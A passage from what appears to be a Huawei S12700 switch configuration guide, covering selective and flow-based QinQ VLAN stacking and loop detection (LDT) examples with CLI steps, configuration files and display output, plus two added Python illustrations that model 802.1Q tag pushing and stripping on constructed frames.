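A frame-level model of the tagging in 6.4.1 (dot1q-tunnel port pushing its default VLAN with outer TPID 0x9100) and 6.4.2 (VLAN stacking 100 -> 2 and 300 -> 3, with the stack VLANs untagged on the hybrid port), added here as an illustration and not S12700 code. Parsing the same frame with a receiver that only knows TPID 0x8100 shows the mismatch that the qinq protocol 9100 setting avoids; stack rules are written as VLAN ranges so the same function also covers range matches such as VLAN 100 to 200. MAC addresses and payloads are constructed.

```python
"""Frame-level model of the QinQ behaviour in 6.4.1 and 6.4.2: a
dot1q-tunnel port pushes its default VLAN as an outer tag (here with the
non-standard outer TPID 0x9100), and VLAN stacking pushes an outer tag
chosen by the inner VLAN ID. Added illustration, not S12700 code; MAC
addresses and payloads used with it are constructed."""
import struct

TPID_8100 = 0x8100   # standard 802.1Q TPID
TPID_9100 = 0x9100   # outer TPID used by the non-Huawei devices in 6.4.1
KNOWN_TPIDS = frozenset({0x8100, 0x88A8, 0x9100})


def build_frame(dst: bytes, src: bytes, tags, ethertype: int, payload: bytes) -> bytes:
    """tags: list of (tpid, vid), outermost first; PCP/DEI bits stay 0."""
    hdr = dst + src
    for tpid, vid in tags:
        if not 1 <= vid <= 4094:
            raise ValueError("invalid VLAN ID %d" % vid)
        hdr += struct.pack("!HH", tpid, vid)
    return hdr + struct.pack("!H", ethertype) + payload


def parse_frame(frame: bytes, known_tpids=KNOWN_TPIDS):
    """Return (tags, ethertype, payload) with tags outermost first.
    A TPID the receiver does not recognise is taken as the EtherType, so a
    0x9100 outer tag is invisible to a device that only knows 0x8100; that
    is the mismatch 'qinq protocol 9100' on GE1/0/3 is there to avoid."""
    tags, off = [], 12
    while True:
        (et,) = struct.unpack_from("!H", frame, off)
        if et not in known_tpids:
            return tags, et, frame[off + 2:]
        (tci,) = struct.unpack_from("!H", frame, off + 2)
        tags.append((et, tci & 0x0FFF))
        off += 4


def dot1q_tunnel_ingress(frame: bytes, default_vlan: int, outer_tpid: int = TPID_8100) -> bytes:
    """Basic QinQ (port link-type dot1q-tunnel): always push the port's
    default VLAN as a new outer tag, whether the frame is tagged or not."""
    return frame[:12] + struct.pack("!HH", outer_tpid, default_vlan) + frame[12:]


def vlan_stacking_ingress(frame: bytes, stack_rules, outer_tpid: int = TPID_8100) -> bytes:
    """Selective QinQ (port vlan-stacking vlan X stack-vlan Y): stack_rules
    is a list of ((lo, hi), outer_vlan); the first range containing the
    inner VLAN ID decides the outer tag. Untagged frames and VLANs without
    a rule pass through unchanged, which is why a VLAN that must stay
    single-tagged is not listed as an inner VLAN (see Configuration Notes)."""
    tags, _, _ = parse_frame(frame)
    if not tags:
        return frame
    inner_vid = tags[0][1]
    for (lo, hi), outer_vlan in stack_rules:
        if lo <= inner_vid <= hi:
            return frame[:12] + struct.pack("!HH", outer_tpid, outer_vlan) + frame[12:]
    return frame


def hybrid_egress_untag(frame: bytes, untagged_vlans) -> bytes:
    """Egress on a hybrid port that joined the stack VLANs untagged
    (port hybrid untagged vlan 2 3): strip the outer tag if its VID is in
    the untagged set, so the PC or phone gets its original single tag back."""
    tags, _, _ = parse_frame(frame)
    if tags and tags[0][1] in untagged_vlans:
        return frame[:12] + frame[16:]
    return frame


# The two rules of 6.4.2 written as single-VLAN ranges
STACK_RULES_6_4_2 = [((100, 100), 2), ((300, 300), 3)]
```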

Configuration Files
l Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 2 to 3
#
interface GigabitEthernet1/0/1
port link-type hybrid
port hybrid untagged vlan 2 to 3
port vlan-stacking vlan 100 stack-vlan 2
port vlan-stacking vlan 300 stack-vlan 3
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 2 to 3
#
return

l Configuration file of SwitchB


#
sysname SwitchB
#
vlan batch 2 to 3
#
interface GigabitEthernet1/0/1
port link-type hybrid
port hybrid untagged vlan 2 to 3
port vlan-stacking vlan 100 stack-vlan 2
port vlan-stacking vlan 300 stack-vlan 3
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 2 to 3
#
return

Related Content
Videos

Configuring QinQ

6.4.3 Example for Configuring Flow-based Selective QinQ

QinQ Overview
802.1Q-in-802.1Q (QinQ) expands VLAN space by adding an additional 802.1Q tag to
802.1Q tagged packets. It allows services in a private VLAN to be transparently transmitted
over a public network.

Selective QinQ, also called VLAN stacking or QinQ stacking, is an extension of QinQ.
Selective QinQ is performed based on interfaces and VLAN IDs. In addition to functions of
basic QinQ, selective QinQ takes different actions for packets received by the same interface
based on VLANs.


Flow-based selective QinQ adds outer VLAN tags based on traffic policies. It can provide
differentiated services based on service types.

Configuration Notes
When configuring selective QinQ on the switch, pay attention to the following points:

l Selective QinQ can only be enabled on hybrid interfaces in the inbound direction.
l The outer VLAN must be created before Selective QinQ is performed.
l When an interface configured with VLAN stacking needs to remove the outer tag from
outgoing frames, the interface must join the VLAN specified by stack-vlan in untagged
mode. If the outer VLAN does not need to be removed, the interface must join the
VLAN specified by stack-vlan in tagged mode.
l The device configured with selective QinQ can add only one outer VLAN tag to a frame
with an inner VLAN tag on an interface.
l If only single-tagged packets from a VLAN need to be transparently transmitted, do not
specify the VLAN as the inner VLAN of selective QinQ.
l This example applies to all versions of the S12700.

Networking Requirements
As shown in Figure 6-20, Internet access users (using PCs) and VoIP users (using VoIP
phones) connect to the ISP network through SwitchA and SwitchB and communicate with
each other through the ISP network.

It is required that packets of PCs and VoIP phones are tagged VLAN 2 and VLAN 3
respectively when the packets are transmitted through the ISP network. Flow-based selective
QinQ can be configured to meet the requirement.

Figure 6-20 Networking of flow-based selective QinQ
(Figure not reproduced. Labels: SwitchA and SwitchB connected through their GE1/0/2 interfaces across the carrier network; on each switch, GE1/0/1 connects PCs in VLAN 100~200 and VoIP phones in VLAN 300~400.)

Configuration Roadmap
The configuration roadmap is as follows:

1. Create VLANs on SwitchA and SwitchB.
2. Configure traffic classifiers, traffic behaviors, and traffic policies on SwitchA and SwitchB.
3. Configure link types of interfaces on SwitchA and SwitchB and add the interfaces to
VLANs.
4. Apply the traffic policies to interfaces on SwitchA and SwitchB to implement selective
QinQ.

Procedure
Step 1 Create VLANs.
# On SwitchA, create VLAN 2 and VLAN 3, that is, VLAN IDs of the outer VLAN tag to be
added.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 2 3

# On SwitchB, create VLAN 2 and VLAN 3, that is, VLAN IDs of the outer VLAN tag to be
added.
<HUAWEI> system-view
[HUAWEI] sysname SwitchB
[SwitchB] vlan batch 2 3

Step 2 Configure traffic classifiers, traffic behaviors, and traffic policies on SwitchA and SwitchB.
# Configure the traffic classifiers, traffic behaviors, and traffic policy on SwitchA.
[SwitchA] traffic classifier name1 //Configure a traffic classifier named name1.
[SwitchA-classifier-name1] if-match vlan-id 100 to 200 //Configure a matching rule to match packets from VLANs 100 to 200.
[SwitchA-classifier-name1] quit
[SwitchA] traffic behavior name1 //Configure a traffic behavior named name1.
[SwitchA-behavior-name1] nest top-most vlan-id 2 //Configure an action of adding VLAN 2 in an outer VLAN tag in a traffic behavior. In V200R009 and later versions, the command is changed to add-tag vlan-id.
[SwitchA-behavior-name1] quit
[SwitchA] traffic classifier name2 //Configure a traffic classifier named name2.
[SwitchA-classifier-name2] if-match vlan-id 300 to 400 //Configure a matching rule to match packets from VLANs 300 to 400.
[SwitchA-classifier-name2] quit
[SwitchA] traffic behavior name2 //Configure a traffic behavior named name2.
[SwitchA-behavior-name2] nest top-most vlan-id 3 //Configure an action of adding VLAN 3 in an outer VLAN tag in a traffic behavior. In V200R009 and later versions, the command is changed to add-tag vlan-id.
[SwitchA-behavior-name2] quit
[SwitchA] traffic policy name1 //Configure a traffic policy named name1.
[SwitchA-trafficpolicy-name1] classifier name1 behavior name1
[SwitchA-trafficpolicy-name1] classifier name2 behavior name2
[SwitchA-trafficpolicy-name1] quit

# Configure the traffic classifiers, traffic behaviors, and traffic policy on SwitchB.
[SwitchB] traffic classifier name1 //Configure a traffic classifier named name1.
[SwitchB-classifier-name1] if-match vlan-id 100 to 200 //Configure a matching
rule to match packets from VLANs 100 to 200.
[SwitchB-classifier-name1] quit
[SwitchB] traffic behavior name1 //Configure a traffic behavior named name1.
[SwitchB-behavior-name1] nest top-most vlan-id 2 //Configure an action of adding
VLAN 2 in an outer VLAN tag in a traffic behavior. In V200R009 and later
versions, the command is changed to add-tag vlan-id.
[SwitchB-behavior-name1] quit
[SwitchB] traffic classifier name2 //Configure a traffic classifier named name2.
[SwitchB-classifier-name2] if-match vlan-id 300 to 400 //Configure a matching
rule to match packets from VLANs 300 to 400.
[SwitchB-classifier-name2] quit
[SwitchB] traffic behavior name2 //Configure a traffic behavior named name2.
[SwitchB-behavior-name2] nest top-most vlan-id 3 //Configure an action of adding
VLAN 3 in an outer VLAN tag in a traffic behavior. In V200R009 and later
versions, the command is changed to add-tag vlan-id.
[SwitchB-behavior-name2] quit
[SwitchB] traffic policy name1 //Configure a traffic policy named name1.
[SwitchB-trafficpolicy-name1] classifier name1 behavior name1
[SwitchB-trafficpolicy-name1] classifier name2 behavior name2
[SwitchB-trafficpolicy-name1] quit

Step 3 Apply the traffic policies to interfaces on SwitchA and SwitchB to implement selective QinQ.
# Configure GE1/0/1 on SwitchA.
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] port link-type hybrid
[SwitchA-GigabitEthernet1/0/1] port hybrid untagged vlan 2 3
[SwitchA-GigabitEthernet1/0/1] traffic-policy name1 inbound //Apply the traffic
policy name1 to the interface in the inbound direction.
[SwitchA-GigabitEthernet1/0/1] quit

# Configure GE1/0/1 on SwitchB.


[SwitchB] interface gigabitethernet 1/0/1
[SwitchB-GigabitEthernet1/0/1] port link-type hybrid
[SwitchB-GigabitEthernet1/0/1] port hybrid untagged vlan 2 3
[SwitchB-GigabitEthernet1/0/1] traffic-policy name1 inbound //Apply the traffic
policy name1 to the interface in the inbound direction.
[SwitchB-GigabitEthernet1/0/1] quit

Step 4 Configure other interfaces.


# Add GE1/0/2 on SwitchA to VLAN 2 and VLAN 3.
[SwitchA] interface gigabitethernet 1/0/2
[SwitchA-GigabitEthernet1/0/2] port link-type trunk
[SwitchA-GigabitEthernet1/0/2] port trunk allow-pass vlan 2 3
[SwitchA-GigabitEthernet1/0/2] quit

# Add GE1/0/2 on SwitchB to VLAN 2 and VLAN 3.


[SwitchB] interface gigabitethernet 1/0/2
[SwitchB-GigabitEthernet1/0/2] port link-type trunk
[SwitchB-GigabitEthernet1/0/2] port trunk allow-pass vlan 2 3
[SwitchB-GigabitEthernet1/0/2] quit

Step 5 Verify the configuration.


If the configurations on SwitchA and SwitchB are correct, you can obtain the following
information:
l PCs can communicate with each other through the ISP network.
l VoIP phones can communicate with each other through the ISP network.

----End

Configuration Files
l Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 2 to 3
#
traffic classifier name1 operator or precedence 5
if-match vlan-id 100 to 200
traffic classifier name2 operator or precedence 10
if-match vlan-id 300 to 400
#
traffic behavior name1
permit
nest top-most vlan-id 2
traffic behavior name2
permit
nest top-most vlan-id 3
#
traffic policy name1 match-order config
classifier name1 behavior name1
classifier name2 behavior name2
#
interface GigabitEthernet1/0/1
port link-type hybrid
port hybrid untagged vlan 2 to 3
traffic-policy name1 inbound
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 2 to 3
#
return

l Configuration file of SwitchB


#
sysname SwitchB
#
vlan batch 2 to 3
#
traffic classifier name1 operator or precedence 5
if-match vlan-id 100 to 200
traffic classifier name2 operator or precedence 10
if-match vlan-id 300 to 400
#
traffic behavior name1
permit
nest top-most vlan-id 2
traffic behavior name2
permit
nest top-most vlan-id 3
#
traffic policy name1 match-order config
classifier name1 behavior name1
classifier name2 behavior name2
#
interface GigabitEthernet1/0/1
port link-type hybrid
port hybrid untagged vlan 2 to 3
traffic-policy name1 inbound
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 2 to 3
#
return
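The selective QinQ policy configured above (inner VLANs 100 to 200 receive outer VLAN 2, inner VLANs 300 to 400 receive outer VLAN 3), shown at the frame level as an added Python example that is not Huawei code and not part of this document. It parses the 802.1Q tag stack of a constructed frame, applies the classifier/behavior pairs of policy name1 as a first-match table, pushes the outer tag the way nest top-most (add-tag vlan-id in V200R009 and later) does, and strips it again as the far-end hybrid port with port hybrid untagged vlan 2 3 would. The outer TPID 0x8100, copying the inner priority bits into the outer tag, and the sample frames are assumptions of this example.

```python
"""Selective QinQ at frame level: what the inbound traffic policy on GE1/0/1 does.

Added example, not Huawei code. Assumptions: the outer tag uses TPID 0x8100 and
copies the inner priority (PCP) bits; sample frames are constructed below.
"""
import struct

TPID_8021Q = 0x8100

# Traffic policy name1 from the page: (inner VLAN range, outer VLAN to add)
SELECTIVE_QINQ_POLICY = [
    ((100, 200), 2),  # classifier name1 -> behavior name1
    ((300, 400), 3),  # classifier name2 -> behavior name2
]


def build_tagged_frame(dst, src, vid, payload, pcp=0, ethertype=0x0800):
    """Constructed sample input: a single-tagged Ethernet frame."""
    tci = (pcp << 13) | (vid & 0x0FFF)
    return dst + src + struct.pack("!HHH", TPID_8021Q, tci, ethertype) + payload


def vlan_tags(frame):
    """VLAN IDs in the tag stack, outermost first (empty list for untagged frames)."""
    vids, off = [], 12
    while len(frame) >= off + 4 and struct.unpack("!H", frame[off:off + 2])[0] == TPID_8021Q:
        vids.append(struct.unpack("!H", frame[off + 2:off + 4])[0] & 0x0FFF)
        off += 4
    return vids


def match_outer_vid(inner_vid, policy=SELECTIVE_QINQ_POLICY):
    """First matching classifier wins (match-order config); None when no rule matches."""
    for (low, high), outer in policy:
        if low <= inner_vid <= high:
            return outer
    return None


def apply_selective_qinq(frame, policy=SELECTIVE_QINQ_POLICY):
    """Inbound on the hybrid port: push an outer tag when the inner VLAN matches a rule."""
    tags = vlan_tags(frame)
    if not tags:
        return frame                            # untagged frame: no classifier matches
    outer = match_outer_vid(tags[0], policy)
    if outer is None:
        return frame                            # e.g. VLAN 50: forwarded unchanged
    inner_tci = struct.unpack("!H", frame[14:16])[0]
    outer_tci = (inner_tci & 0xE000) | outer    # keep the PCP bits, replace the VID
    # nest top-most: the new tag becomes the outermost one, the original tag is kept
    return frame[:12] + struct.pack("!HH", TPID_8021Q, outer_tci) + frame[12:]


def pop_outer_tag(frame, untagged_vlans=(2, 3)):
    """Egress on the far-end hybrid port (port hybrid untagged vlan 2 3): strip the outer tag."""
    tags = vlan_tags(frame)
    if tags and tags[0] in untagged_vlans:
        return frame[:12] + frame[16:]
    return frame


def sample_frame(vid):
    """Constructed frame: broadcast destination, arbitrary source, PCP 5, 20-byte dummy payload."""
    return build_tagged_frame(b"\xff" * 6, b"\x00\x11\x22\x33\x44\x55", vid, b"\x00" * 20, pcp=5)
```

vlan_tags returns the stack outermost first, so a frame from VLAN 150 reads [2, 150] after the policy and [150] again after pop_outer_tag; a frame from VLAN 50 or an untagged frame passes through both functions unchanged, which is the behaviour to verify when a customer VLAN is unexpectedly missing from the ISP side.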

6.5 Typical Loopback Detection Configuration

6.5.1 Example for Configuring LDT to Detect Loops on the Downstream Network

LDT Overview
When a loop occurs on a network, broadcast, multicast, and unknown unicast packets are
repeatedly transmitted on the network. This wastes network resources or even causes network
breakdown. Quickly detecting loops on a Layer 2 network can minimize the impact of loops
on the entire network; therefore, a detection technology that notifies users of loops is required.
When a loop occurs, users are requested to check network connections and configurations,
and control the problematic interface.

Loop detection (LDT) periodically sends LDT packets on an interface to check whether the
packets return to the local device (receive and transmit interfaces can be different), and
determines whether loops occur on the interface, local network, or downstream network.
l If LDT packets are received by the same interface, a loopback occurs on the interface or
a loop occurs on the network connected to the interface.
l If LDT packets are received by another interface on the same device, a loop occurs on
the network connected to the interface.

After loops are detected, the device can send alarms to the NMS and record logs, and control
the interface status (the interface is shut down by default) according to the device
configuration so that the impact of loops on the device and network is minimized. The device
provides the following actions after LDT detects a loop:
l Trap: The device reports a trap to the NMS and records a log, but does not take any
action on the interface.
l Block: The device blocks this interface, and can forward only BPDUs.
l No learning: The interface is disabled from learning MAC addresses.
l Shutdown: The device shuts down the interface.
l Quitvlan: The interface is removed from the VLAN where a loop occurs.

The problematic interface continues to send LDT packets. If the device receives no LDT
packets from the problematic interface within the recovery time, it considers that the loop is
eliminated on the interface and restores the interface.

LDT can only detect loops on a single node, but cannot eliminate loops on the entire network
in the same manner as ring network technologies of ERPS, RRPP, SEP, Smart Link, and STP/
RSTP/MSTP/VBST.

Configuration Notes
l This example applies to all versions of the S12700.
l LDT and LBDT cannot be configured simultaneously.
l LDT needs to send a large number of LDT packets to detect loops, occupying system
resources. Therefore, disable LDT if loops do not need to be detected.
l When loops occur in multiple VLANs on many interfaces, LDT performance is lowered
due to limitations of security policies and CPU processing capability. The more VLANs
and interfaces are involved, the lower the performance is, especially performance of the
standby chassis in the cluster. Manually eliminating loops is recommended.
l LDT cannot be used with ring network technologies of ERPS, RRPP, SEP, Smart Link,
and STP/RSTP/MSTP/VBST. Do not configure ring network technologies on an
interface of an LDT-enabled VLAN. Conversely, if LDT has been enabled globally and
ring network technologies need to be configured on an interface, disable LDT on the
interface first.

l LDT sends only tagged packets and can only detect loops based on VLANs. LDT can
detect loops in a maximum of 4094 VLANs, and cannot detect loops in dynamic
VLANs.
l When a loop occurs on the network-side interface where the Block or Shutdown action
is configured, all services on the device are interrupted. Do not deploy LDT on the
network-side interface.
l The Quitvlan action cannot be used with GVRP, or the action of removing an interface
from the VLAN where MAC address flapping occurs.

Networking Requirements
As shown in Figure 6-21, a new branch network of an enterprise connects to the aggregation
switch Switch, and VLANs 10 to 20 are deployed on the branch network. Loops occur due to
incorrect connections or configurations. As a result, communication on the Switch and uplink
network is affected.

It is required that the Switch should immediately detect loops on the new branch network to
prevent the impact of loops on the Switch and uplink network.

Figure 6-21 Networking for configuring LDT to detect loops on the downstream network
[Figure: Switch, with GE1/0/1 connected to the new branch network carrying VLANs 10-20]

Configuration Roadmap
Loops need to be detected in VLANs 10 to 20 (more than eight VLANs) on the new branch
network, so you need to configure LDT on the Switch to detect loops on the new branch
network. The configuration roadmap is as follows:

1. Enable LDT on GE1/0/1 of the Switch to detect loops in a specified VLAN so that loops
on the downstream network can be detected.
2. Configure an action after loops are detected so that the Switch can immediately shut
down the interface where a loop is detected. This prevents the impact of the loop on the
Switch and uplink network.


NOTE

Configure interfaces on other switching devices as trunk or hybrid interfaces and configure these
interfaces to allow packets from corresponding VLANs to pass through to ensure Layer 2 connectivity
on the new network and between the new network and the Switch.

Procedure
Step 1 Enable global LDT.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] loop-detection enable //Enable LDT globally.

Step 2 Enable LDT in VLANs.


[Switch] vlan batch 10 to 20
[Switch] loop-detection enable vlan 10 to 20 //Enable the device to detect loops
on all interfaces in VLANs 10 to 20.

Step 3 Set the interval for sending LDT packets.


[Switch] loop-detection interval-time 10 //Set the interval for sending LDT
packets to 10s.

Step 4 Configure an action taken after a loop is detected.


# Enable the trap function for LDT.
[Switch] snmp-agent trap enable feature-name ldttrap //Enable the LDT alarm
function so that the device can send LDT traps.

# Set the action to Shutdown.


[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] port link-type hybrid //The default link type of a
switch interface is not hybrid. Run the port link-type hybrid command to configure
the link type of the interface as hybrid.
[Switch-GigabitEthernet1/0/1] stp disable //Disable STP on the interface.
[Switch-GigabitEthernet1/0/1] port hybrid tagged vlan 10 to 20
[Switch-GigabitEthernet1/0/1] loop-detection mode port-shutdown //Configure the
Shutdown action to be taken on GE1/0/1 after a loop is detected.
[Switch-GigabitEthernet1/0/1] quit

Step 5 Verify the configuration.


# After the configuration is complete, run the display loop-detection command to check
global LDT information.
[Switch] display loop-detection
Loop Detection is enabled.
Detection interval time is 10 seconds.
Following VLANs enable loop-detection:
VLAN 10 to 20
Following ports are blocked for loop:
NULL
Following ports are shutdown for loop:
GigabitEthernet1/0/1 Include Vlans:
10
Following ports are nolearning for loop:
NULL
Following ports are trapped for loop:
NULL
Following ports are quitvlan for loop:
NULL

# Check LDT information on GE1/0/1.


[Switch] display loop-detection interface gigabitethernet 1/0/1
The port is enabled.
The port's status list:
Status WorkMode Recovery-time EnabledVLAN
-----------------------------------------------------------------------
Shutdown Shutdown 255 10
Normal Shutdown 255 11
Normal Shutdown 255 12
Normal Shutdown 255 13
Normal Shutdown 255 14
Normal Shutdown 255 15
Normal Shutdown 255 16
Normal Shutdown 255 17
Normal Shutdown 255 18
Normal Shutdown 255 19
Normal Shutdown 255 20

The command output shows that LDT is enabled in VLANs 10 to 20 and the Shutdown
action is taken on GE1/0/1 in VLAN 10, indicating that loops are detected in VLAN 10.

NOTE

After loops are detected in one or more VLANs, the system shuts down the interface and the loops
are removed. In this case, LDT may be unable to identify all the VLANs where loops occurred.

----End

Configuration Files
Configuration file of the Switch
#
sysname Switch
#
vlan batch 10 to 20
#
loop-detection enable
loop-detection interval-time 10
loop-detection enable vlan 10 to 20
#
interface GigabitEthernet1/0/1
port link-type hybrid
port hybrid tagged vlan 10 to 20
stp disable
#
snmp-agent trap enable feature-name LDTTRAP
#
return

6.5.2 Example for Configuring LDT to Detect Loops on the Local Network

LDT Overview
When a loop occurs on a network, broadcast, multicast, and unknown unicast packets are
repeatedly transmitted on the network. This wastes network resources or even causes network
breakdown. Quickly detecting loops on a Layer 2 network can minimize the impact of loops
on the entire network; therefore, a detection technology that notifies users of loops is required.
When a loop occurs, users are requested to check network connections and configurations,
and control the problematic interface.
Loop detection (LDT) periodically sends LDT packets on an interface to check whether the
packets return to the local device (receive and transmit interfaces can be different), and
determines whether loops occur on the interface, local network, or downstream network.


l If LDT packets are received by the same interface, a loopback occurs on the interface or
a loop occurs on the network connected to the interface.
l If LDT packets are received by another interface on the same device, a loop occurs on
the network connected to the interface.
After loops are detected, the device can send alarms to the NMS and record logs, and control
the interface status (the interface is shut down by default) according to the device
configuration so that the impact of loops on the device and network is minimized. The device
provides the following actions after LDT detects a loop:
l Trap: The device reports a trap to the NMS and records a log, but does not take any
action on the interface.
l Block: The device blocks this interface, and can forward only BPDUs.
l No learning: The interface is disabled from learning MAC addresses.
l Shutdown: The device shuts down the interface.
l Quitvlan: The interface is removed from the VLAN where a loop occurs.
The problematic interface continues to send LDT packets. If the device receives no LDT
packets from the problematic interface within the recovery time, it considers that the loop is
eliminated on the interface and restores the interface.
LDT can only detect loops on a single node, but cannot eliminate loops on the entire network
in the same manner as ring network technologies of ERPS, RRPP, SEP, Smart Link, and STP/
RSTP/MSTP/VBST.

Configuration Notes
l This example applies to all versions of the S12700.
l LDT and LBDT cannot be configured simultaneously.
l LDT needs to send a large number of LDT packets to detect loops, occupying system
resources. Therefore, disable LDT if loops do not need to be detected.
l When loops occur in multiple VLANs on many interfaces, LDT performance is lowered
due to limitations of security policies and CPU processing capability. The more VLANs
and interfaces are involved, the lower the performance is, especially performance of the
standby chassis in the cluster. Manually eliminating loops is recommended.
l LDT cannot be used with ring network technologies of ERPS, RRPP, SEP, Smart Link,
and STP/RSTP/MSTP/VBST. Do not configure ring network technologies on an
interface of an LDT-enabled VLAN. Conversely, if LDT has been enabled globally and
ring network technologies need to be configured on an interface, disable LDT on the
interface first.
l LDT sends only tagged packets and can only detect loops based on VLANs. LDT can
detect loops in a maximum of 4094 VLANs, and cannot detect loops in dynamic
VLANs.
l When a loop occurs on the network-side interface where the Block or Shutdown action
is configured, all services on the device are interrupted. Do not deploy LDT on the
network-side interface.
l The Quitvlan action cannot be used with GVRP, or the action of removing an interface
from the VLAN where MAC address flapping occurs.

Networking Requirements
As shown in Figure 6-22, an enterprise uses Layer 2 networking. The Switch is the
aggregation switch, and each switch allows packets from VLANs 10 to 20 to pass through.


Because employees often move, the network topology changes frequently. Connections or
configurations may be incorrect due to misoperations. As a result, loops may occur in VLANs
10 to 20.
Loops cause broadcast storms and affect device and network communication. It is required
that loops be detected and eliminated in VLANs in a timely manner to prevent broadcast
storms.

Figure 6-22 Networking for configuring LDT to detect loops on the local network
[Figure: Switch, with GE1/0/0 and GE2/0/0 connected to the Layer 2 network carrying VLANs 10~20]

Configuration Roadmap
Loops need to be detected in VLANs 10 to 20. Because there are more than eight VLANs,
you can configure LDT to detect loops and configure an action after loops are detected to
prevent broadcast storms. All VLANs share a link. To prevent loop removal in a VLAN from
affecting data forwarding in other VLANs, configure the Quitvlan action. The configuration
roadmap is as follows:
1. Enable LDT on GE1/0/0 and GE2/0/0 on the Switch to detect loops in VLANs 10 to 20.
2. Configure an action to be taken after a loop is detected on GE1/0/0 and GE2/0/0, and set
the recovery time so that the Switch can immediately take the preconfigured action on
the interface to prevent broadcast storms after a loop is detected. In addition, the Switch
can restore the interface after the loop is eliminated.
NOTE

Configure interfaces on other switching devices as trunk or hybrid interfaces and configure these
interfaces to allow packets from corresponding VLANs to pass through to ensure Layer 2 connectivity.

Procedure
Step 1 Enable global LDT.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] loop-detection enable //Enable LDT globally.

Step 2 Enable LDT in VLANs.


[Switch] vlan batch 10 to 20
[Switch] loop-detection enable vlan 10 to 20 //Enable the device to detect loops
on all interfaces in VLANs 10 to 20.

Step 3 Set the interval for sending LDT packets.


[Switch] loop-detection interval-time 10 //Set the interval for sending LDT
packets to 10s.


Step 4 Configure an action to be taken after a loop is detected.


# Enable the trap function for LDT.
[Switch] snmp-agent trap enable feature-name ldttrap //Enable the LDT alarm
function so that the device can send LDT traps.

# Set the action to Quitvlan.


[Switch] interface gigabitethernet 1/0/0
[Switch-GigabitEthernet1/0/0] port link-type hybrid //The default link type of a
switch interface is not hybrid. Run the port link-type hybrid command to configure
the link type of the interface as hybrid.
[Switch-GigabitEthernet1/0/0] stp disable //Disable STP on the interface.
[Switch-GigabitEthernet1/0/0] port hybrid tagged vlan 10 to 20
[Switch-GigabitEthernet1/0/0] loop-detection mode port-quitvlan //Configure the
Quitvlan action to be taken after a loop is detected.
[Switch-GigabitEthernet1/0/0] quit
[Switch] interface gigabitethernet 2/0/0
[Switch-GigabitEthernet2/0/0] port link-type hybrid
[Switch-GigabitEthernet2/0/0] stp disable //Disable STP on the interface.
[Switch-GigabitEthernet2/0/0] port hybrid tagged vlan 10 to 20
[Switch-GigabitEthernet2/0/0] loop-detection mode port-quitvlan //Configure the
Quitvlan action to be taken after a loop is detected.
[Switch-GigabitEthernet2/0/0] quit

Step 5 Set the interface recovery time.


[Switch] interface gigabitethernet 1/0/0
[Switch-GigabitEthernet1/0/0] loop-detection recovery-time 30 //Set the recovery
time to 30s.
[Switch-GigabitEthernet1/0/0] quit
[Switch] interface gigabitethernet 2/0/0
[Switch-GigabitEthernet2/0/0] loop-detection recovery-time 30 //Set the recovery
time to 30s.
[Switch-GigabitEthernet2/0/0] quit

Step 6 Verify the configuration.


1. Check the LDT configuration.
# After the configuration is complete, run the display loop-detection command to check
global LDT information.
[Switch] display loop-detection
Loop Detection is enabled.
Detection interval time is 10 seconds.
Following VLANs enable loop-detection:
VLAN 10 to 20
Following ports are blocked for loop:
NULL
Following ports are shutdown for loop:
NULL
Following ports are nolearning for loop:
NULL
Following ports are trapped for loop:
NULL
Following ports are quitvlan for loop:
GigabitEthernet1/0/0 Include Vlans:
10 11 12 16 19
GigabitEthernet2/0/0 Include Vlans:
13 14 15 17 18
20

# Check LDT information on GE1/0/0 and GE2/0/0.


[Switch] display loop-detection interface gigabitethernet 1/0/0
The port is enabled.
The port's status list:
Status WorkMode Recovery-time EnabledVLAN
-----------------------------------------------------------------------
Quitvlan Quitvlan 30 10
Quitvlan Quitvlan 30 11
Quitvlan Quitvlan 30 12
Normal Quitvlan 30 13
Normal Quitvlan 30 14
Normal Quitvlan 30 15
Quitvlan Quitvlan 30 16
Normal Quitvlan 30 17
Normal Quitvlan 30 18
Quitvlan Quitvlan 30 19
Normal Quitvlan 30 20
[Switch] display loop-detection interface gigabitethernet 2/0/0
The port is enabled.
The port's status list:
Status WorkMode Recovery-time EnabledVLAN
-----------------------------------------------------------------------
Normal Quitvlan 30 10
Normal Quitvlan 30 11
Normal Quitvlan 30 12
Quitvlan Quitvlan 30 13
Quitvlan Quitvlan 30 14
Quitvlan Quitvlan 30 15
Normal Quitvlan 30 16
Quitvlan Quitvlan 30 17
Quitvlan Quitvlan 30 18
Normal Quitvlan 30 19
Quitvlan Quitvlan 30 20

In the command output, LDT is enabled in VLANs 10 to 20, GE1/0/0 is removed from
VLANs 10, 11, 12, 16, and 19, and GE2/0/0 is removed from VLANs 13, 14, 15, 17, 18,
and 20.
NOTE

The VLANs that an interface is removed from are uncertain, but the interface will be removed
from all VLANs where loops occur.
2. After the loop is eliminated (for example, GE2/0/0 is shut down, and connections
between devices are corrected), check whether GE1/0/0 and GE2/0/0 are restored.
[Switch] display loop-detection interface gigabitethernet 1/0/0
The port is enabled.
The port's status list:
Status WorkMode Recovery-time EnabledVLAN
-----------------------------------------------------------------------
Normal Quitvlan 30 10
Normal Quitvlan 30 11
Normal Quitvlan 30 12
Normal Quitvlan 30 13
Normal Quitvlan 30 14
Normal Quitvlan 30 15
Normal Quitvlan 30 16
Normal Quitvlan 30 17
Normal Quitvlan 30 18
Normal Quitvlan 30 19
Normal Quitvlan 30 20
[Switch] display loop-detection interface gigabitethernet 2/0/0
The port is enabled.
The port's status list:
Status WorkMode Recovery-time EnabledVLAN
-----------------------------------------------------------------------
Normal Quitvlan 30 10
Normal Quitvlan 30 11
Normal Quitvlan 30 12
Normal Quitvlan 30 13
Normal Quitvlan 30 14
Normal Quitvlan 30 15
Normal Quitvlan 30 16
Normal Quitvlan 30 17
Normal Quitvlan 30 18
Normal Quitvlan 30 19
Normal Quitvlan 30 20
